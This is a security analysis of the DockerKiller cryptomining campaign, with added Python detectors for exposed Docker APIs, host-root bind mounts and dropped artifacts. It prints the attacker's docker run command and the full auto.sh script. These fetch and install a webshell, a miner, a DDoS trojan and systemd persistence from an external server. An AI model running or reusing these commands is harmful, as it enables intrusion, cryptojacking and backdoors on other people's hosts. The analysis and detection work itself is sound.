
Scanning and Intrusion Script Analysis for DockerKiller Threat

This article analyzes the scanning and intrusion scripts used by the DockerKiller threat.

From the logs in p.txt, we can see that the author of the scripts used Masscan on July 16, 2018 to scan five network segments in the 172 address range. We suspect that this was a test run of the scanning script.

test.sh is the intrusion script. It reads the list of Docker hosts with port 2375 open from dockerips.txt, which Masscan produced. For each IP address in that list, the script exploits the unauthorized Docker access vulnerability to download auto.sh from the 159.203.21.* server and execute it; once auto.sh has run, it is deleted.

The key shell command from test.sh: it starts an alpine container with the host's root filesystem bind-mounted at /mnt and chroots into it, so that wget and auto.sh run on the host rather than inside the container:

docker -H tcp://$HOSTLINE:2375 run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "wget http://159.203.21.239/p/auto.sh" -O auto.sh;chmod 777 auto.sh;sleep 2s;sh auto.sh;sleep 5s;rm auto.sh
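Two checks a defender would want after reading the command above, written here as added example code (not part of the original analysis and not an Alibaba Cloud tool): the first parses a dockerd command line, such as the ExecStart of docker.service, and flags a TCP API listener configured without --tlsverify, which is the unauthenticated port-2375 exposure Masscan finds; the second inspects a Docker Engine API /containers/create request body, as seen in daemon audit or proxy logs, and flags the host-root bind mount plus chroot that the attacker's `-v /:/mnt alpine chroot /mnt` relies on. The sample command line and request bodies are constructed for illustration.

```python
"""Defender-side checks for the Docker intrusion path shown above.

Added example code; not part of the original analysis or of any Alibaba Cloud
tool. The sample inputs at the bottom are constructed for illustration.
"""
import json
import posixpath
import shlex
from typing import Any, List

# Host paths whose bind mount hands the container control of the host.
SENSITIVE_HOST_PATHS = {"/etc", "/root", "/proc", "/sys", "/var/run/docker.sock"}


def audit_docker_hosts(exec_start: str) -> List[str]:
    """Return a finding for each tcp:// listener configured without --tlsverify."""
    argv = shlex.split(exec_start)
    tls_verify = any(
        a == "--tlsverify" or (a.startswith("--tlsverify=") and not a.endswith("=false"))
        for a in argv
    )
    hosts: List[str] = []
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
            i += 2
            continue
        if arg.startswith("--host="):
            hosts.append(arg[len("--host="):])
        elif arg.startswith("-H") and len(arg) > 2:
            hosts.append(arg[2:])  # "-Htcp://..." form
        i += 1
    return [f"unauthenticated Docker API listener: {h}"
            for h in hosts if h.startswith("tcp://") and not tls_verify]


def _as_list(value: Any) -> List[str]:
    """Cmd/Entrypoint may be given as a list or as a single shell string."""
    if value is None:
        return []
    return shlex.split(value) if isinstance(value, str) else list(value)


def flag_host_root_mount(create_body: str) -> List[str]:
    """Return findings for a JSON /containers/create request body."""
    body = json.loads(create_body)
    host_cfg = body.get("HostConfig") or {}
    # Binds are "host:container[:opts]"; Mounts carry an explicit Source.
    sources = [b.split(":", 1)[0] for b in host_cfg.get("Binds") or []]
    sources += [m.get("Source", "") for m in host_cfg.get("Mounts") or []
                if m.get("Type") == "bind"]
    findings: List[str] = []
    host_root = False
    for src in sources:
        if not src.startswith("/"):
            continue  # a named volume, not a host path
        norm = posixpath.normpath(src)
        if norm.strip("/") == "":
            norm = "/"  # normpath keeps a leading "//"; treat it as root
        if norm == "/":
            host_root = True
            findings.append("host root filesystem bind-mounted into the container")
        elif norm in SENSITIVE_HOST_PATHS:
            findings.append(f"sensitive host path bind-mounted: {norm}")
    if host_cfg.get("Privileged"):
        findings.append("privileged container requested")
    argv = _as_list(body.get("Entrypoint")) + _as_list(body.get("Cmd"))
    if host_root and "chroot" in argv:
        findings.append("chroot into the mounted host root: commands will execute on the host")
    return findings


# Constructed samples: an exposed daemon and a create request modelled on the
# attacker's docker run command (the payload is replaced by a harmless "id").
SAMPLE_EXEC_START = "/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"
SAMPLE_CREATE = json.dumps({
    "Image": "alpine",
    "Cmd": ["chroot", "/mnt", "/bin/sh", "-c", "id"],
    "HostConfig": {"Binds": ["/:/mnt"], "AutoRemove": True},
})

if __name__ == "__main__":
    for line in audit_docker_hosts(SAMPLE_EXEC_START) + flag_host_root_mount(SAMPLE_CREATE):
        print(line)
```

The first check is the one that removes the root cause: a daemon that only listens on the Unix socket, or on TCP with --tlsverify and client certificates, is not reachable by this scanner. The second check is a log-time detector; a request that bind-mounts `/` and chroots into it has no legitimate purpose in an image-running workflow and is worth an alert on its own.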

Once the Docker host is compromised and auto.sh runs, it removes any earlier versions of the malicious files, downloads updated files from the attacker's server to the compromised host (the webshell, the mining program, the backdoor program, the systemd unit files, and the mining configuration file), and then executes them.

The sequence of the attack is as follows:

  1. Clean-up: earlier versions of the mining program, DDoS Trojan, services, and their configuration files are removed.
  2. Fresh download: the webshell backdoor, DDoS Trojan, and mining program are downloaded.
  3. Execution: the mining program and DDoS Trojan are installed as systemd services and started.

The related script, auto.sh, is as follows:
#! /bin/sh
rm bashd.1;
rm xm.1;
rm data.cfg.1;
rm bashd.service.1;
rm xm.service.1;
wget http://159.203.21.239/p/p.php -O privacy.php | sed 's/\r//g';
cp privacy.php /var/www/html/privacy.php;
cp privacy.php /var/www/privacy.php;
rm privacy.php;
chmod -R 777 /var/www;
wget http://159.203.21.239/p/bashd -O bashd | sed 's/\r//g';
wget http://159.203.21.239/p/xm -O xm | sed 's/\r//g';
wget http://159.203.21.239/p/data.cfg -O data.cfg | sed 's/\r//g';
wget http://159.203.21.239/p/bashd.service -O bashd.service | sed 's/\r//g';
wget http://159.203.21.239/p/xm.service -O xm.service | sed 's/\r//g';
sleep 2s;
chmod 777 bashd;
chmod 777 xm;
sleep 2s;
mv "bashd.service" "/etc/systemd/system/bashd.service";
mv "xm.service" "/etc/systemd/system/xm.service";
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl stop xm.service;
systemctl enable bashd.service;
systemctl start bashd.service;
systemctl enable xm.service;
systemctl start xm.service;
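The script above leaves a fixed set of host artifacts: the two unit files in /etc/systemd/system, the webshell copied to /var/www/html/privacy.php and /var/www/privacy.php, and a world-writable /var/www from the chmod -R 777. The following host triage routine, added here as example code (it is not part of the original analysis and not an Alibaba Cloud tool), checks a filesystem tree for exactly those paths and for world-writable entries under the web root. build_sample_root() constructs a throwaway directory containing placeholder files at those paths so the check can be exercised offline; on a live host, call hunt_dockerkiller("/").

```python
"""Host triage for the persistence artifacts auto.sh drops.

Added example code, not part of the original analysis. hunt_dockerkiller()
walks a filesystem tree (``root``; "/" on a live host) looking for the paths
written by auto.sh and for the world-writable /var/www it leaves behind.
build_sample_root() creates a constructed sample tree for offline testing.
"""
import os
import stat
import tempfile
from typing import List

# Paths written by auto.sh, relative to the filesystem root.
DROPPED_FILES = (
    "etc/systemd/system/bashd.service",
    "etc/systemd/system/xm.service",
    "var/www/html/privacy.php",
    "var/www/privacy.php",
)
WEBROOT = "var/www"  # target of "chmod -R 777 /var/www"


def hunt_dockerkiller(root: str = "/") -> List[str]:
    """Return sorted findings: dropped artifacts present and world-writable web-root entries."""
    findings: List[str] = []
    for rel in DROPPED_FILES:
        if os.path.lexists(os.path.join(root, rel)):
            findings.append(f"artifact present: /{rel}")
    webroot = os.path.join(root, WEBROOT)
    if os.path.isdir(webroot):
        for dirpath, _, filenames in os.walk(webroot):
            # os.walk visits every directory as dirpath, so checking dirpath
            # plus its files covers the whole tree.
            for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
                if os.lstat(path).st_mode & stat.S_IWOTH:
                    findings.append(f"world-writable: /{os.path.relpath(path, root)}")
    return sorted(findings)


def build_sample_root() -> str:
    """Construct a temporary tree that mimics a host after auto.sh has run."""
    root = tempfile.mkdtemp(prefix="dockerkiller-sample-")
    for rel in DROPPED_FILES:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("# constructed placeholder, not real file content\n")
    # Reproduce "chmod -R 777 /var/www" on the sample tree.
    for dirpath, _, filenames in os.walk(os.path.join(root, WEBROOT)):
        os.chmod(dirpath, 0o777)
        for name in filenames:
            os.chmod(os.path.join(dirpath, name), 0o777)
    return root


if __name__ == "__main__":
    sample = build_sample_root()
    for line in hunt_dockerkiller(sample):
        print(line)
```

The unit file names and the two webshell paths come straight from the script, so a hit on any of them is high-confidence; the world-writable check is broader and will also catch sloppy deployments, but after a DockerKiller infection it is what distinguishes the chmod -R 777 from a simple file drop.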
